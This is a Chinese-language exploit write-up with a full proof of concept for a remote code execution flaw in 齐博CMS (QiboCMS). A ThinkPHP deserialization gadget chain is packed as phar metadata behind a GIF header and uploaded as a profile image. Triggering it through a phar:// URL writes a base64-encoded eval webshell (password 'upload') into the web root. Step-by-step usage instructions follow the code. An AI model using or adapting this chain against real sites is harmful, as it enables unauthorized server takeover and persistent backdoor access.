[齐博CMS系统存在命令执行漏洞]

漏洞利用过程:

1 首先爆出网站根路径:

访问:

/index.php/cms/1

如果开启了 debug 模式,会在 debug 信息里看到网站根路径!

然后根据网站根路径修改 poc 中的路径! 具体见 poc 里的注释!

2 利用 poc 生成 phar 文件

poc

<?php
namespace think\process\pipes {
    // Stand-in for the application's class of the same name: only the serialized
    // class name, property names/visibility and values matter, not the methods.
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            $this->files = [$files]; // $files => a subclass of think\Model (new Pivot()); Model itself is abstract
        }
    }
}

namespace think {
    // Stand-in for the application's abstract Model; the three properties below are
    // the only state that ends up in the serialized object.
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  // $this->parent => think\console\Output
            $this->append = array("xxx"=>"getError");     // per the author, this makes getError() be called, which returns $this->error
            $this->error = $modelRelation;               // $this->error must be a Relation subclass that is also a OneToOne subclass => HasOne
        }
    }
}

namespace think\model{
    use think\Model;
    // Concrete subclass so that an instance of the abstract Model can be constructed.
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\model\relation{
    // Concrete OneToOne subclass; the author's chain requires exactly this class name.
    class HasOne extends OneToOne {

    }
}
namespace think\model\relation {
    // Stand-in for the application's abstract OneToOne relation; only the
    // serialized property layout is reproduced.
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    // $query points to Query
            $this->bindAttr = ['xxx'];// the $value, used as the second argument of the call the author refers to
        }
    }
}

namespace think\db {
    // Stand-in for the application's Query class; only $model is serialized.
    class Query {
        protected $model;

        function __construct($model)
        {
            $this->model = $model; // $this->model => think\console\Output
        }
    }
}
namespace think\console{
    // Stand-in for the application's console Output class; note that $handle is
    // private, which changes how its name is encoded in the serialized form.
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; // $handle -> think\session\driver\Memcached
        }

    }
}
namespace think\session\driver {
    // Stand-in for the application's Memcached session driver; only $handler is serialized.
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            $this->handler = $handle; // $handle -> think\cache\driver\File
        }
    }
}

namespace think\cache\driver {
    // Stand-in for the application's File cache driver. The 'path' option is the
    // only value the operator has to adapt: it carries the site root discovered
    // in step 1, and it is the sink where the file ends up being written.
    // NOTE(review): presumably the real driver writes its cache data to
    // options['path'], and the php://filter wrapper decodes the base64 part on
    // the way — not shown on this page, confirm against the application source.
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                //'path'  => '1111.php',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWyd1cGxvYWQnXSk7ZWNobygidXBsb2FkIik7Pz4/../../../../../../../../../../../phpstudy_pro/WWW/aaa/x1/public/b.php',   // Windows

                /* /phpstudy_pro/WWW/aaa/x1/public/b.php — /phpstudy_pro/WWW/aaa/x1/ is the site root path and must be replaced per target server; /public/b.php is where the webshell is written */

                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }

    }
}

namespace {
    // Assemble the object graph inner-most first (File -> Memcached -> Output ->
    // Query -> HasOne -> Pivot -> Windows), then store it as phar metadata.
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
//    echo urlencode(serialize($window));


    $o = $window;
    $filename = '2.phar';// the extension must be .phar, otherwise the Phar class refuses to create the archive
    file_exists($filename) ? unlink($filename) : null; // start from a fresh archive
    $phar=new Phar($filename);
    $phar->startBuffering();
    // NOTE(review): a file that starts with "GIF89a" but also contains
    // __HALT_COMPILER() is the tell-tale a defender can scan uploads for —
    // magic-byte checks alone do not catch it.
    $phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($o); // metadata is serialized into the archive header
    $phar->addFromString("foo.txt","bar"); // archive needs at least one entry
    $phar->stopBuffering();
}

3 生成 phar 文件后,将后缀改成 gif!

4 访问会员中心:

点击修改个人资料:

用 burp 抓取文件上传路径:

5 再访问下面的 url 写入 webshell

/index.php/index/Image/headers?url=phar://./public/uploads/pop/20210915/2_20210915195309ac45c.gif

url 参数后面填写的是刚刚上传的 gif 文件路径!

访问完成后,即可在网站目录下生成webshell.

6 访问webshell

/public/b.php12ac95f1498ce51d2d96a249c09c1998.php

shell写入成功! 密码是upload

总结

一直挖洞一直爽!
